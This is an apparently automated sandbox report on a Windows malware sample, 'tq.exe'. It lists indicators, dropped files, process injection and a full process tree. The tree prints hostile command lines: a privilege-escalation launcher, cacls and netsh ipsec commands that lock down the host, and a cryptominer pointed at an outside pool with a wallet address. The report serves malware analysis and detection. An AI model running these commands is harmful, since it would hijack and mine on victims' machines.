0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15

Analysis

max time kernel
55s
max time network
150s
platform
windows10_x64
resource
win10v20210408
submitted
07-05-2021 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tq.exe
Size

418KB
MD5

e8450e61f061fd90d74507eb04845ecd
SHA1

f344f20c57f9cb01ea3166f3404336da1519a832
SHA256

0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
SHA512

d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91

Score

10^/10

persistence upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 3348 created 2732 3348 svchost.exe MS19.exe
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

MS19.exeMS20.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exewudfhosts.exe

pid process

2732 MS19.exe
3936 MS20.exe
3752 MSSQLH.exe
1384 RunDllExe.exe
196 RunDllExe.exe
3828 x64.exe
2836 wudfhosts.exe
Registers new Print Monitor 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

description	pid	process	target process
PID 3348 created 2732	3348	svchost.exe	MS19.exe

pid	process
2732	MS19.exe
3936	MS20.exe
3752	MSSQLH.exe
1384	RunDllExe.exe
196	RunDllExe.exe
3828	x64.exe
2836	wudfhosts.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Windows\Cursors\wudfhosts.exe	upx
C:\Windows\Cursors\WUDFhosts.exe	upx

Loads dropped DLL 2 IoCs

Processes:

svchost.exe

pid process

1980
2140 svchost.exe

pid	process
1980
2140	svchost.exe

Drops file in System32 directory 6 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

RunDllExe.exeRunDllExe.exesvchost.exe

description	pid	process	target process
PID 196 set thread context of 1524	196	RunDllExe.exe	svchost.exe
PID 1384 set thread context of 1340	1384	RunDllExe.exe	svchost.exe
PID 2140 set thread context of 2912	2140	svchost.exe	svchost.exe

Drops file in Windows directory 17 IoCs

Processes:

RunDllExe.exex64.exeMSSQLH.exesvchost.exeRunDllExe.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\RunDllExe_New.dll	RunDllExe.exe
File created	C:\Windows\Help\active_desktop_render.dll	x64.exe
File opened for modification	C:\Windows\Cursors\WUDFhosts.exe	x64.exe
File created	C:\Windows\Logs\RunDllExe.exe	MSSQLH.exe
File created	C:\Windows\MpMgSvc.dll	MSSQLH.exe
File opened for modification	C:\Windows\Logs\RunDllExe	RunDllExe.exe
File created	C:\Windows\Cursors\WUDFhosts.exe	x64.exe
File created	C:\Windows\Help\active_desktop_render_New.dll	svchost.exe
File created	C:\Windows\Logs\RunDllExe.dll	MSSQLH.exe
File created	C:\Windows\Logs\Vers.txt	MSSQLH.exe
File created	C:\Windows\Logs\RunDllExe_New.dll	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe.dll	RunDllExe.exe
File created	C:\Windows\Logs\RunDllExe_New	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe	RunDllExe.exe
File created	C:\Windows\Logs\RunDllExe_New	RunDllExe.exe
File opened for modification	C:\Windows\Help\active_desktop_render.dll	svchost.exe
File created	C:\Windows\Logs\RunDllExe	MSSQLH.exe

Modifies data under HKEY_USERS 8 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

MSSQLH.exesvchost.exe

pid	process
3752	MSSQLH.exe
3752	MSSQLH.exe
2912	svchost.exe
2912	svchost.exe
2912	svchost.exe
2912	svchost.exe
2912	svchost.exe
2912	svchost.exe
2912	svchost.exe
2912	svchost.exe
2912	svchost.exe
2912	svchost.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

MS19.exesvchost.exeMS20.exeMSSQLH.exesvchost.exewudfhosts.exe

description	pid	process
Token: SeImpersonatePrivilege	2732	MS19.exe
Token: SeAssignPrimaryTokenPrivilege	2732	MS19.exe
Token: SeTcbPrivilege	3348	svchost.exe
Token: SeTcbPrivilege	3348	svchost.exe
Token: SeImpersonatePrivilege	3936	MS20.exe
Token: SeRestorePrivilege	3752	MSSQLH.exe
Token: SeBackupPrivilege	3752	MSSQLH.exe
Token: SeSecurityPrivilege	3752	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3752	MSSQLH.exe
Token: SeRestorePrivilege	3752	MSSQLH.exe
Token: SeBackupPrivilege	3752	MSSQLH.exe
Token: SeSecurityPrivilege	3752	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3752	MSSQLH.exe
Token: SeRestorePrivilege	3752	MSSQLH.exe
Token: SeBackupPrivilege	3752	MSSQLH.exe
Token: SeSecurityPrivilege	3752	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3752	MSSQLH.exe
Token: SeRestorePrivilege	3752	MSSQLH.exe
Token: SeBackupPrivilege	3752	MSSQLH.exe
Token: SeSecurityPrivilege	3752	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3752	MSSQLH.exe
Token: SeRestorePrivilege	3752	MSSQLH.exe
Token: SeBackupPrivilege	3752	MSSQLH.exe
Token: SeSecurityPrivilege	3752	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3752	MSSQLH.exe
Token: SeRestorePrivilege	3752	MSSQLH.exe
Token: SeBackupPrivilege	3752	MSSQLH.exe
Token: SeSecurityPrivilege	3752	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3752	MSSQLH.exe
Token: SeRestorePrivilege	3752	MSSQLH.exe
Token: SeBackupPrivilege	3752	MSSQLH.exe
Token: SeSecurityPrivilege	3752	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	3752	MSSQLH.exe
Token: SeRestorePrivilege	2912	svchost.exe
Token: SeBackupPrivilege	2912	svchost.exe
Token: SeSecurityPrivilege	2912	svchost.exe
Token: SeTakeOwnershipPrivilege	2912	svchost.exe
Token: SeLockMemoryPrivilege	2836	wudfhosts.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exesvchost.exe

pid process

2840 tq.exe
3752 MSSQLH.exe
1384 RunDllExe.exe
196 RunDllExe.exe
3828 x64.exe
2140 svchost.exe
2912 svchost.exe
2912 svchost.exe

pid	process
2840	tq.exe
3752	MSSQLH.exe
1384	RunDllExe.exe
196	RunDllExe.exe
3828	x64.exe
2140	svchost.exe
2912	svchost.exe
2912	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exe

description	pid	process	target process
PID 2840 wrote to memory of 2732	2840	tq.exe	MS19.exe
PID 2840 wrote to memory of 2732	2840	tq.exe	MS19.exe
PID 2840 wrote to memory of 3936	2840	tq.exe	MS20.exe
PID 2840 wrote to memory of 3936	2840	tq.exe	MS20.exe
PID 2840 wrote to memory of 3752	2840	tq.exe	MSSQLH.exe
PID 2840 wrote to memory of 3752	2840	tq.exe	MSSQLH.exe
PID 2840 wrote to memory of 3752	2840	tq.exe	MSSQLH.exe
PID 3752 wrote to memory of 2776	3752	MSSQLH.exe	cacls.exe
PID 3752 wrote to memory of 2776	3752	MSSQLH.exe	cacls.exe
PID 3752 wrote to memory of 2776	3752	MSSQLH.exe	cacls.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 196 wrote to memory of 1524	196	RunDllExe.exe	svchost.exe
PID 1384 wrote to memory of 1340	1384	RunDllExe.exe	svchost.exe
PID 3752 wrote to memory of 3828	3752	MSSQLH.exe	x64.exe
PID 3752 wrote to memory of 3828	3752	MSSQLH.exe	x64.exe
PID 3752 wrote to memory of 3828	3752	MSSQLH.exe	x64.exe
PID 3828 wrote to memory of 3952	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3952	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3952	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3808	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3808	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3808	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 1336	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 1336	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 1336	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2644	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2644	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2644	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2428	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2428	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2428	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3816	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3816	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3816	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2996	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2996	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2996	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3044	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3044	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3044	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3460	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3460	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3460	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3908	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3908	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 3908	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2580	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2580	3828	x64.exe	netsh.exe
PID 3828 wrote to memory of 2580	3828	x64.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\tq.exe
"C:\Users\Admin\AppData\Local\Temp\tq.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2840

C:\Users\Admin\AppData\Local\Temp\MS19.exe
C:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2732

C:\Users\Admin\AppData\Local\Temp\MS20.exe
C:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3752

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\*.exe /e /d system
3⤵
PID:2776

C:\Users\Admin\AppData\Local\Temp\x64.exe
x64.exe
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
4⤵
PID:3952

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
4⤵
PID:3808

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
4⤵
PID:1336

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
4⤵
PID:2644

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
4⤵
PID:2428

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
4⤵
PID:3816

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
4⤵
PID:2996

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
4⤵
PID:3044

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
4⤵
PID:3460

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
4⤵
PID:3908

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
4⤵
PID:2580

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"
4⤵
PID:3752

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:3348

C:\Windows\Logs\RunDllExe.exe
C:\Windows\Logs\RunDllExe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:1340

C:\Windows\Logs\RunDllExe.exe
C:\Windows\Logs\RunDllExe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:196

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:1524

\??\c:\windows\syswow64\svchost.exe
c:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2140

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2912

C:\Windows\Cursors\wudfhosts.exe
C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2836

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
C:\Windows\Cursors\WUDFhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Cursors\wudfhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Logs\RunDllExe
MD5
509d3832d107461a37868327f06143a0

SHA1
7a0d9ac45b20476438c189eb1254e01e5b04a94d

SHA256
b7dddd6ffbca35e4e2260197e5395c6ac8c926bef591fcd0195e5e90521f58cb

SHA512
2b70f5690c38295567e6010ead674f93ea6d6bda6102e37a368df83f7d206b19a6b90d8c8fd5aa82e93681dd936bcbb609f0ac13c457223879426ebbccf03e37

Download Submit
C:\Windows\Logs\RunDllExe
MD5
509d3832d107461a37868327f06143a0

SHA1
7a0d9ac45b20476438c189eb1254e01e5b04a94d

SHA256
b7dddd6ffbca35e4e2260197e5395c6ac8c926bef591fcd0195e5e90521f58cb

SHA512
2b70f5690c38295567e6010ead674f93ea6d6bda6102e37a368df83f7d206b19a6b90d8c8fd5aa82e93681dd936bcbb609f0ac13c457223879426ebbccf03e37

Download Submit
C:\Windows\Logs\RunDllExe.dll
MD5
5ebe9eba3361ea00cd3031961dc2830f

SHA1
afa93aa84ec59b2cd56057dd1ae58a2e451f5d77

SHA256
0da702bb6f4d61e940727da8ff67db135632e2d24d0c94c6f5e3927ef3502512

SHA512
d501c82b870e2f97e9aadef409e098482c698b16ab1e8abdd8f8b4add6ebe137021511f32285bfa8f923dd4cd195454ef850ecd8f1651c5c891118f50115c4f3

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
C:\Windows\Logs\RunDllExe_New.dll
MD5
5ebe9eba3361ea00cd3031961dc2830f

SHA1
afa93aa84ec59b2cd56057dd1ae58a2e451f5d77

SHA256
0da702bb6f4d61e940727da8ff67db135632e2d24d0c94c6f5e3927ef3502512

SHA512
d501c82b870e2f97e9aadef409e098482c698b16ab1e8abdd8f8b4add6ebe137021511f32285bfa8f923dd4cd195454ef850ecd8f1651c5c891118f50115c4f3

Download Submit
C:\Windows\Logs\RunDllExe_New.dll
MD5
5ebe9eba3361ea00cd3031961dc2830f

SHA1
afa93aa84ec59b2cd56057dd1ae58a2e451f5d77

SHA256
0da702bb6f4d61e940727da8ff67db135632e2d24d0c94c6f5e3927ef3502512

SHA512
d501c82b870e2f97e9aadef409e098482c698b16ab1e8abdd8f8b4add6ebe137021511f32285bfa8f923dd4cd195454ef850ecd8f1651c5c891118f50115c4f3

Download Submit
\??\c:\windows\help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Windows\Help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Windows\Logs\RunDllExe.dll
MD5
c02d9300deea8aaa42bf5e9c56ddcf29

SHA1
4c547bab0a92ba6fe77a8bfcef56faf5f1a0ad89

SHA256
54dd6ca2fab1eab858fa8d06fa095a943d6d1ff601c71a4c6af5e9061019f9d5

SHA512
c2537d3bf63bf67ac0e844fc65285bcd444896201fd14add9bef7bab054eb93269248ecfa752268e3f692bb8ea3bc8d861e40f4ba5f63b5428f8f75a204315e1

Download Submit
memory/1336-154-0x0000000000000000-mapping.dmp

Download
memory/1340-137-0x00000000004054EC-mapping.dmp

Download
memory/1340-132-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1524-147-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1524-130-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1524-128-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1524-136-0x00000000004054EC-mapping.dmp

Download
memory/2428-156-0x0000000000000000-mapping.dmp

Download
memory/2580-162-0x0000000000000000-mapping.dmp

Download
memory/2644-155-0x0000000000000000-mapping.dmp

Download
memory/2732-114-0x0000000000000000-mapping.dmp

Download
memory/2776-127-0x0000000000000000-mapping.dmp

Download
memory/2836-176-0x0000000000000000-mapping.dmp

Download
memory/2836-178-0x000001CEFA420000-0x000001CEFA430000-memory.dmp

Filesize
64KB

Download
memory/2836-179-0x000001CEFA440000-0x000001CEFA450000-memory.dmp

Filesize
64KB

Download
memory/2836-180-0x000001CEFA450000-0x000001CEFA460000-memory.dmp

Filesize
64KB

Download
memory/2836-181-0x000001CEFA460000-0x000001CEFA470000-memory.dmp

Filesize
64KB

Download
memory/2912-171-0x0000000010072B6D-mapping.dmp

Download
memory/2912-174-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/2912-166-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
